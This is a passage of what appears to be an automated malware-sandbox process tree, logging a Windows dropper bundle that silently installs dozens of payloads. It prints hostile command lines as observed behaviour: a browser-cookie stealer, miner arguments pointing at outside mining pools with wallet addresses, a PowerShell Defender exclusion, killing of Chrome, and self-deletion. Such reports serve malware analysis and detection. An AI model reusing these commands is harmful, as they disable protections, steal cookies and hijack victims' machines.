- Suspicious use of AdjustPrivilegeToken
PID:4604

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4500

C:\Users\Admin\AppData\Local\Temp\is-OVL7H.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-OVL7H.tmp\Setup3310.tmp" /SL5="$30340,138429,56832,C:\Users\Admin\AppData\Local\Temp\r3t1pneez0p\Setup3310.exe" /Verysilent /subid=577
1⤵
PID:5432
- C:\Users\Admin\AppData\Local\Temp\is-0Q2I1.tmp\Setup.exe
  "C:\Users\Admin\AppData\Local\Temp\is-0Q2I1.tmp\Setup.exe" /Verysilent
  2⤵
  PID:676
- - C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe
    "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"
    3⤵
    PID:5680
  - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:6540
  - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:6884
- - C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe
    "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"
    3⤵
    PID:4592
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 944
      4⤵
      Program crash
      PID:7908
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 928
      4⤵
      Program crash
      PID:7620
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 1056
      4⤵
      Program crash
      PID:7788
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 1200
      4⤵
      Program crash
      PID:7332
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 1248
      4⤵
      Program crash
      PID:7804
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 1320
      4⤵
      Program crash
      PID:1912
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 1608
      4⤵
      Program crash
      PID:1188
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 1688
      4⤵
      Program crash
      PID:6908
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 1820
      4⤵
      Program crash
      PID:6216
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 1716
      4⤵
      Program crash
      PID:5856
- - C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe
    "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"
    3⤵
    PID:5864
- - C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe
    "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"
    3⤵
    PID:4024
  - - C:\Users\Admin\AppData\Local\Temp\is-C6M0G.tmp\lylal220.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-C6M0G.tmp\lylal220.tmp" /SL5="$404D0,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"
      4⤵
      PID:4572
    - - C:\Users\Admin\AppData\Local\Temp\is-NREBS.tmp\Microsoft.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-NREBS.tmp\Microsoft.exe" /S /UID=lylal220
        5⤵
        
        PID:6328
      - C:\Users\Admin\AppData\Local\Temp\d3-4b95a-3e5-d5b85-3ee9015ff0f5c\Fyzhypylawy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\d3-4b95a-3e5-d5b85-3ee9015ff0f5c\Fyzhypylawy.exe"
        6⤵
        
        PID:1908
      - C:\Users\Admin\AppData\Local\Temp\63-57da5-ea6-86f95-56a4e72719909\Legaxemaeva.exe
        
        "C:\Users\Admin\AppData\Local\Temp\63-57da5-ea6-86f95-56a4e72719909\Legaxemaeva.exe"
        6⤵
        
        PID:6900
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gu32ukul.onw\md6_6ydj.exe & exit
        7⤵
        
        PID:1048
        
        C:\Users\Admin\AppData\Local\Temp\gu32ukul.onw\md6_6ydj.exe
        
        C:\Users\Admin\AppData\Local\Temp\gu32ukul.onw\md6_6ydj.exe
        8⤵
        
        PID:7448
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tckjdlc5.ujc\askinstall31.exe & exit
        7⤵
        
        PID:7072
        
        C:\Users\Admin\AppData\Local\Temp\tckjdlc5.ujc\askinstall31.exe
        
        C:\Users\Admin\AppData\Local\Temp\tckjdlc5.ujc\askinstall31.exe
        8⤵
        
        PID:7592
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        9⤵
        
        PID:7220
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        10⤵
        Kills process with taskkill
        
        PID:6592
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dz0as4vw.5va\GcleanerWW.exe /mixone & exit
        7⤵
        
        PID:5156
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ord1it2c.0g5\toolspab1.exe & exit
        7⤵
        
        PID:6188
        
        C:\Users\Admin\AppData\Local\Temp\ord1it2c.0g5\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\ord1it2c.0g5\toolspab1.exe
        8⤵
        
        PID:7740
        
        C:\Users\Admin\AppData\Local\Temp\ord1it2c.0g5\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\ord1it2c.0g5\toolspab1.exe
        9⤵
        
        PID:8068
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qpujvqyq.kth\setup_10.2_mix.exe & exit
        7⤵
        
        PID:200
        
        C:\Users\Admin\AppData\Local\Temp\qpujvqyq.kth\setup_10.2_mix.exe
        
        C:\Users\Admin\AppData\Local\Temp\qpujvqyq.kth\setup_10.2_mix.exe
        8⤵
        
        PID:7800
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\a1q15ydm.jgg\file.exe & exit
        7⤵
        
        PID:4500
        
        C:\Users\Admin\AppData\Local\Temp\a1q15ydm.jgg\file.exe
        
        C:\Users\Admin\AppData\Local\Temp\a1q15ydm.jgg\file.exe
        8⤵
        
        PID:8052
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"
        9⤵
        
        PID:5688
        
        C:\Users\Admin\AppData\Local\Temp\L8MWPZ03DP\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\L8MWPZ03DP\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        10⤵
        
        PID:4864
        
        C:\Users\Admin\AppData\Local\Temp\L8MWPZ03DP\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\L8MWPZ03DP\multitimer.exe" 1 3.1617513425.60694bd14e141 101
        11⤵
        
        PID:8028
        
        C:\Users\Admin\AppData\Local\Temp\L8MWPZ03DP\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\L8MWPZ03DP\multitimer.exe" 2 3.1617513425.60694bd14e141
        12⤵
        
        PID:6252
        
        C:\Users\Admin\AppData\Local\Temp\vh1x0oycs3o\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\vh1x0oycs3o\app.exe" /8-23
        13⤵
        
        PID:8752
        
        C:\Users\Admin\AppData\Local\Temp\23jgmynptwj\0rzhqoarfxj.exe
        
        "C:\Users\Admin\AppData\Local\Temp\23jgmynptwj\0rzhqoarfxj.exe" /ustwo INSTALL
        13⤵
        
        PID:8796
        
        C:\Users\Admin\AppData\Local\Temp\gl0qzl3ccfk\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\gl0qzl3ccfk\cpyrix.exe" /VERYSILENT
        13⤵
        
        PID:8784
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        14⤵
        
        PID:8140
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        14⤵
        
        PID:2456
        
        C:\Users\Admin\AppData\Local\Temp\pxfyi410os0\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\pxfyi410os0\vict.exe" /VERYSILENT /id=535
        13⤵
        
        PID:8776
        
        C:\Users\Admin\AppData\Local\Temp\is-IJLEQ.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-IJLEQ.tmp\vict.tmp" /SL5="$20682,870426,780800,C:\Users\Admin\AppData\Local\Temp\pxfyi410os0\vict.exe" /VERYSILENT /id=535
        14⤵
        
        PID:8204
        
        C:\Users\Admin\AppData\Local\Temp\is-0DI5V.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-0DI5V.tmp\win1host.exe" 535
        15⤵
        
        PID:8308
        
        C:\Users\Admin\AppData\Local\Temp\3qeopyzvwbs\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3qeopyzvwbs\Setup3310.exe" /Verysilent /subid=577
        13⤵
        
        PID:8744
        
        C:\Users\Admin\AppData\Local\Temp\is-FAGGJ.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-FAGGJ.tmp\Setup3310.tmp" /SL5="$2067C,138429,56832,C:\Users\Admin\AppData\Local\Temp\3qeopyzvwbs\Setup3310.exe" /Verysilent /subid=577
        14⤵
        
        PID:9184
        
        C:\Users\Admin\AppData\Local\Temp\JSMP9JY168\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\JSMP9JY168\setups.exe" ll
        10⤵
        Adds Run key to start application
        Suspicious use of SetThreadContext
        
        PID:4684
        
        C:\Users\Admin\AppData\Local\Temp\is-5B20I.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-5B20I.tmp\setups.tmp" /SL5="$7039A,635399,250368,C:\Users\Admin\AppData\Local\Temp\JSMP9JY168\setups.exe" ll
        11⤵
        
        PID:768
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"
        9⤵
        
        PID:5172
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        10⤵
        
        PID:5304
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        11⤵
        Kills process with taskkill
        
        PID:420
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe"
        9⤵
        
        PID:6868
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
        10⤵
        
        PID:6376
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
        11⤵
        
        PID:7228
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"
        9⤵
        
        PID:5980
        
        C:\Users\Admin\AppData\Roaming\BE13.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\BE13.tmp.exe"
        10⤵
        
        PID:4740
        
        C:\Users\Admin\AppData\Roaming\BD09.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\BD09.tmp.exe"
        10⤵
        
        PID:7712
        
        C:\Windows\system32\msiexec.exe
        
        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
        11⤵
        
        PID:5064
        
        C:\Windows\system32\msiexec.exe
        
        -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
        11⤵
        
        PID:8392
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"
        10⤵
        
        PID:4720
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        11⤵
        Runs ping.exe
        
        PID:8668
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"
        9⤵
        
        PID:4204
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5cv4yim2.glt\app.exe /8-2222 & exit
        7⤵
        
        PID:4356
        
        C:\Users\Admin\AppData\Local\Temp\5cv4yim2.glt\app.exe
        
        C:\Users\Admin\AppData\Local\Temp\5cv4yim2.glt\app.exe /8-2222
        8⤵
        
        PID:5532
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uuub5uw0.d5x\Four.exe & exit
        7⤵
        
        PID:8552
        
        C:\Users\Admin\AppData\Local\Temp\uuub5uw0.d5x\Four.exe
        
        C:\Users\Admin\AppData\Local\Temp\uuub5uw0.d5x\Four.exe
        8⤵
        
        PID:9016
      - C:\Program Files\Google\JTMFWPFIPU\irecord.exe
        
        "C:\Program Files\Google\JTMFWPFIPU\irecord.exe" /VERYSILENT
        6⤵
        
        PID:6808
- - C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe
    "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"
    3⤵
    PID:3116
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"
      4⤵
      PID:6476
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install
        5⤵
        
        PID:6872
- - C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe
    "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"
    3⤵
    PID:5312
  - - C:\Users\Admin\AppData\Local\Temp\is-2MP62.tmp\LabPicV3.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-2MP62.tmp\LabPicV3.tmp" /SL5="$20376,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"
      4⤵
      PID:5000
    - - C:\Users\Admin\AppData\Local\Temp\is-7PA7R.tmp\ppppppfy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-7PA7R.tmp\ppppppfy.exe" /S /UID=lab214
        5⤵
        
        PID:6564
      - C:\Users\Admin\AppData\Local\Temp\64-03840-56f-e21a9-f40bd7ff49c60\Novivojeshae.exe
        
        "C:\Users\Admin\AppData\Local\Temp\64-03840-56f-e21a9-f40bd7ff49c60\Novivojeshae.exe"
        6⤵
        
        PID:204
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jlk5ou3q.5nw\md6_6ydj.exe & exit
        7⤵
        
        PID:4560
        
        C:\Users\Admin\AppData\Local\Temp\jlk5ou3q.5nw\md6_6ydj.exe
        
        C:\Users\Admin\AppData\Local\Temp\jlk5ou3q.5nw\md6_6ydj.exe
        8⤵
        
        PID:7580
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xfh4t4xb.oro\askinstall31.exe & exit
        7⤵
        
        PID:5172
        
        C:\Users\Admin\AppData\Local\Temp\xfh4t4xb.oro\askinstall31.exe
        
        C:\Users\Admin\AppData\Local\Temp\xfh4t4xb.oro\askinstall31.exe
        8⤵
        
        PID:7684
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eemisezd.1gv\toolspab1.exe & exit
        7⤵
        
        PID:6084
        
        C:\Users\Admin\AppData\Local\Temp\eemisezd.1gv\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\eemisezd.1gv\toolspab1.exe
        8⤵
        
        PID:7724
        
        C:\Users\Admin\AppData\Local\Temp\eemisezd.1gv\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\eemisezd.1gv\toolspab1.exe
        9⤵
        
        PID:8076
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3ykhwxf5.lrb\GcleanerWW.exe /mixone & exit
        7⤵
        
        PID:7296
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wquo0ypl.hai\setup_10.2_mix.exe & exit
        7⤵
        
        PID:2732
        
        C:\Users\Admin\AppData\Local\Temp\wquo0ypl.hai\setup_10.2_mix.exe
        
        C:\Users\Admin\AppData\Local\Temp\wquo0ypl.hai\setup_10.2_mix.exe
        8⤵
        
        PID:2364
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\u5u2dstz.xrr\file.exe & exit
        7⤵
        
        PID:4236
        
        C:\Users\Admin\AppData\Local\Temp\u5u2dstz.xrr\file.exe
        
        C:\Users\Admin\AppData\Local\Temp\u5u2dstz.xrr\file.exe
        8⤵
        
        PID:4280
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"
        9⤵
        
        PID:6644
        
        C:\Users\Admin\AppData\Local\Temp\L7ETRJ8DET\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\L7ETRJ8DET\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        10⤵
        
        PID:9124
        
        C:\Users\Admin\AppData\Local\Temp\W8O8NYNWD1\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\W8O8NYNWD1\setups.exe" ll
        10⤵
        
        PID:8404
        
        C:\Users\Admin\AppData\Local\Temp\is-DFV8O.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-DFV8O.tmp\setups.tmp" /SL5="$10702,635399,250368,C:\Users\Admin\AppData\Local\Temp\W8O8NYNWD1\setups.exe" ll
        11⤵
        
        PID:9156
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe"
        9⤵
        
        PID:5832
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        10⤵
        
        PID:8280
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        11⤵
        Kills process with taskkill
        
        PID:2716
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pl3w1sxo.t1u\app.exe /8-2222 & exit
        7⤵
        
        PID:4216
        
        C:\Users\Admin\AppData\Local\Temp\pl3w1sxo.t1u\app.exe
        
        C:\Users\Admin\AppData\Local\Temp\pl3w1sxo.t1u\app.exe /8-2222
        8⤵
        
        PID:8724
      - C:\Users\Admin\AppData\Local\Temp\e0-4e322-5bc-d739e-48a4430a3c86d\ZHulaerikada.exe
        
        "C:\Users\Admin\AppData\Local\Temp\e0-4e322-5bc-d739e-48a4430a3c86d\ZHulaerikada.exe"
        6⤵
        
        PID:6752
      - C:\Program Files\Windows Multimedia Platform\FKVSOPLQFH\prolab.exe
        
        "C:\Program Files\Windows Multimedia Platform\FKVSOPLQFH\prolab.exe" /VERYSILENT
        6⤵
        
        PID:6652
- - C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\f49msXwaGcZo.exe
    "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\f49msXwaGcZo.exe"
    3⤵
    PID:1624
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      4⤵
      PID:6632
- - C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe
    "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"
    3⤵
    PID:3676
  - - C:\Users\Admin\AppData\Local\Temp\L576TR96Z6\multitimer.exe
      "C:\Users\Admin\AppData\Local\Temp\L576TR96Z6\multitimer.exe" 0 306065bb10421b26.04333812 0 103
      4⤵
      PID:7072
    - - C:\Users\Admin\AppData\Local\Temp\L576TR96Z6\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\L576TR96Z6\multitimer.exe" 1 3.1617513254.60694b2625703 103
        5⤵
        
        PID:6492
      - C:\Users\Admin\AppData\Local\Temp\L576TR96Z6\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\L576TR96Z6\multitimer.exe" 2 3.1617513254.60694b2625703
        6⤵
        
        PID:4464
        
        C:\Users\Admin\AppData\Local\Temp\0jfuofvpbbp\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0jfuofvpbbp\cpyrix.exe" /VERYSILENT
        7⤵
        
        PID:2724
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        8⤵
        
        PID:8180
        
        C:\Users\Admin\AppData\Local\Temp\c4006a12-7c42-479d-9399-039d652d9394\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\c4006a12-7c42-479d-9399-039d652d9394\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\c4006a12-7c42-479d-9399-039d652d9394\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        9⤵
        
        PID:4540
        
        C:\Users\Admin\AppData\Local\Temp\c4006a12-7c42-479d-9399-039d652d9394\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\c4006a12-7c42-479d-9399-039d652d9394\AdvancedRun.exe" /SpecialRun 4101d8 4540
        10⤵
        
        PID:3520
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force
        9⤵
        
        PID:7068
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout 1
        9⤵
        
        PID:8088
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 1
        10⤵
        Delays execution with timeout.exe
        
        PID:8032
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "C:\Users\Admin\AppData\Roaming\1.exe"
        9⤵
        
        PID:7148
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 8180 -s 1580
        9⤵
        Program crash
        
        PID:2280
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        8⤵
        
        PID:4940
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        9⤵
        
        PID:7036
        
        C:\Users\Admin\AppData\Local\Temp\m3fmusi4c5o\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\m3fmusi4c5o\vpn.exe" /silent /subid=482
        7⤵
        
        PID:6628
        
        C:\Users\Admin\AppData\Local\Temp\is-OA72M.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-OA72M.tmp\vpn.tmp" /SL5="$702EC,15170975,270336,C:\Users\Admin\AppData\Local\Temp\m3fmusi4c5o\vpn.exe" /silent /subid=482
        8⤵
        
        PID:5248
        
        C:\Users\Admin\AppData\Local\Temp\k5nw40icvnk\1ucihgixdhp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\k5nw40icvnk\1ucihgixdhp.exe" /ustwo INSTALL
        7⤵
        
        PID:5340
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "1ucihgixdhp.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\k5nw40icvnk\1ucihgixdhp.exe" & exit
        8⤵
        
        PID:6876
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "1ucihgixdhp.exe" /f
        9⤵
        Kills process with taskkill
        
        PID:7792
        
        C:\Users\Admin\AppData\Local\Temp\mpugljkujbo\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\mpugljkujbo\Setup3310.exe" /Verysilent /subid=577
        7⤵
        
        PID:5060
        
        C:\Users\Admin\AppData\Local\Temp\2wsbl4y5ygl\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2wsbl4y5ygl\vict.exe" /VERYSILENT /id=535
        7⤵
        
        PID:5292
        
        C:\Users\Admin\AppData\Local\Temp\is-N2JBH.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-N2JBH.tmp\vict.tmp" /SL5="$4022E,870426,780800,C:\Users\Admin\AppData\Local\Temp\2wsbl4y5ygl\vict.exe" /VERYSILENT /id=535
        8⤵
        
        PID:492
        
        C:\Users\Admin\AppData\Local\Temp\3ocp3zinwer\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3ocp3zinwer\app.exe" /8-23
        7⤵
        
        PID:6040
  - - C:\Users\Admin\AppData\Local\Temp\GRZ7C2ZTBQ\setups.exe
      "C:\Users\Admin\AppData\Local\Temp\GRZ7C2ZTBQ\setups.exe" ll
      4⤵
      PID:6148
    - - C:\Users\Admin\AppData\Local\Temp\is-0B0VG.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-0B0VG.tmp\setups.tmp" /SL5="$404B6,635399,250368,C:\Users\Admin\AppData\Local\Temp\GRZ7C2ZTBQ\setups.exe" ll
        5⤵
        
        PID:6504
- - C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe
    "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"
    3⤵
    PID:4840
- - C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe
    "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"
    3⤵
    PID:4936
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
      4⤵
      PID:5444
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
        5⤵
        
        PID:6460

C:\Users\Admin\AppData\Local\Temp\is-6HBJR.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-6HBJR.tmp\vict.tmp" /SL5="$10370,870426,780800,C:\Users\Admin\AppData\Local\Temp\3qvvyeemdzy\vict.exe" /VERYSILENT /id=535
1⤵
PID:5476
- C:\Users\Admin\AppData\Local\Temp\is-Q8ELE.tmp\win1host.exe
  "C:\Users\Admin\AppData\Local\Temp\is-Q8ELE.tmp\win1host.exe" 535
  2⤵
  PID:1772
- - C:\Users\Admin\AppData\Local\Temp\AVUow7ehG.exe
    "C:\Users\Admin\AppData\Local\Temp\AVUow7ehG.exe"
    3⤵
    PID:7892
  - - C:\Windows\SysWOW64\at.exe
      "C:\Windows\System32\at.exe"
      4⤵
      PID:7752
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Marito.gif
      4⤵
      PID:6388
    - - C:\Windows\SysWOW64\cmd.exe
        
